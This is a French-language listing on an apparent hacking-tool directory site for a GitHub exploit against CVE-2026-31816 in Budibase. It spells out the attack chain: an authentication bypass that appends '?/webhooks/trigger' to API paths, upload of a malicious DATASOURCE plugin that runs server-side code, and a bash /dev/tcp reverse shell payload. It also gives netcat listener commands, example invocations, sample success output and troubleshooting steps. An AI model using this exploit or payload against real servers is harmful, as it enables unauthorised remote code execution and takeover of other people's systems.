Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-31816-rshell — Exploite la CVE-2026-31816 dans Budibase pour contourner l'authentification, téléverser un plugin de source de données malveillant et exécuter un shell inversé pour un accès à distance. | Kitploit
Outils/GitHubGitHub/imjdl/cve-2026-31816-rshell
ExploitationExploitation d'Applications WebAuthentificationOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubimjdl/cve-2026-31816-rshell

CVE-2026-31816-rshell

Exploite la CVE-2026-31816 dans Budibase pour contourner l'authentification, téléverser un plugin de source de données malveillant et exécuter un shell inversé pour un accès à distance.

Voir le dépôt
il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit Reverse Shell CVE-2026-31816

Vue d'ensemble

Cet outil exploite la CVE-2026-31816 pour établir une connexion reverse shell sur un serveur Budibase cible.

Chaîne d'attaque : Contournement d'authentification → Téléversement d'un plugin DATASOURCE → Exécution de code côté serveur → Reverse Shell

Prérequis

  • Python 3.6+
  • Bibliothèque requests (pip install requests)
  • Serveur Budibase cible vulnérable à la CVE-2026-31816

Utilisation

Étapes de base

root@kitploit:~
# 1. Démarrer un listener sur la machine de l'attaquant
nc -lvnp 4444

# 2. Exécuter l'exploit (autre terminal)
python3 CVE-2026-31816-rshell.py -t http://cible:10000 --lhost VOTRE_IP --lport 4444

Paramètres

ParamètreRequisDescription
-t, --target✅URL Budibase cible
--lhost✅Hôte du listener (votre IP)
--lport❌Port du listener (défaut : 4444)

Exemples

root@kitploit:~
# IP de l'attaquant : 192.168.1.100
# Budibase cible : 192.168.1.128:10000

# Terminal 1 - Démarrer le listener
nc -lvnp 4444

# Terminal 2 - Exécuter l'exploit
python3 CVE-2026-31816-rshell.py \
    -t http://192.168.1.128:10000 \
    --lhost 192.168.1.100 \
    --lport 4444

Fonctionnement

1. Vérification de la vulnérabilité

root@kitploit:~
GET /api/integrations?/webhooks/trigger

Si la réponse est 200, la cible est vulnérable au contournement d'authentification.

2. Création du plugin malveillant

root@kitploit:~
{
  "type": "datasource",
  "schema": { ... }
}

Les plugins de type DATASOURCE exécutent du code JavaScript sur le serveur.

3. Payload du reverse shell

root@kitploit:~
// Exécuté lors de la validation du plugin :
bash -c 'bash -i >& /dev/tcp/LHOST/LPORT 0>&1'

4. Téléversement et exécution

root@kitploit:~
POST /api/plugin/upload?/webhooks/trigger

Téléversement du plugin en contournant l'authentification. Le code s'exécute pendant la validation.

Flux d'attaque

root@kitploit:~
┌─────────────┐     ┌─────────────┐     ┌─────────────┐
│  Attaquant  │     │  Serveur    │     │  Listener   │
│             │     │  Cible      │     │   (nc)      │
│             │     │             │     │             │
│ exploit ────┼────►│ Téléverse   │     │             │
│             │     │ Plugin      │     │             │
│             │     │ Exécute     │────►│ Écoute      │
│             │     │ Code        │◄────┤ Connexion   │
│             │     │             │     │ Inverse     │
└─────────────┘     └─────────────┘     └─────────────┘

Indicateur de succès

root@kitploit:~
============================================================
CVE-2026-31816 - Exploit Reverse Shell
============================================================
[*] Cible : http://192.168.1.128:10000
[*] Reverse shell : 192.168.1.100:4444

[*] Vérification de la vulnérabilité...
[+] La cible est vulnérable !
[*] Création du plugin reverse shell ciblant 192.168.1.100:4444

[*] Téléversement du plugin reverse shell...
[*] Statut : 200
[+] Plugin installé avec succès !

============================================================
[+] SUCCÈS ! Vérifiez votre listener !
============================================================

Dépannage

Q : Échec de la connexion, aucun shell reçu

Causes possibles :

  1. Le pare-feu bloque la connexion inverse
  2. Le serveur cible ne peut pas joindre l'IP de l'attaquant
  3. Le serveur cible ne dispose pas de bash

Solutions :

root@kitploit:~
# Vérifier la connectivité réseau
ping VOTRE_IP

# Vérifier le pare-feu
sudo ufw allow 4444/tcp

# Essayer un autre port
nc -lvnp 8080

Q : Échec du téléversement

Causes possibles :

  1. La cible a corrigé la vulnérabilité
  2. Problèmes réseau

Solutions :

root@kitploit:~
# Tester manuellement si la vulnérabilité existe
curl -s "http://cible:10000/api/integrations?/webhooks/trigger"
# Si un JSON est renvoyé, la vulnérabilité existe
Télécharger l’outil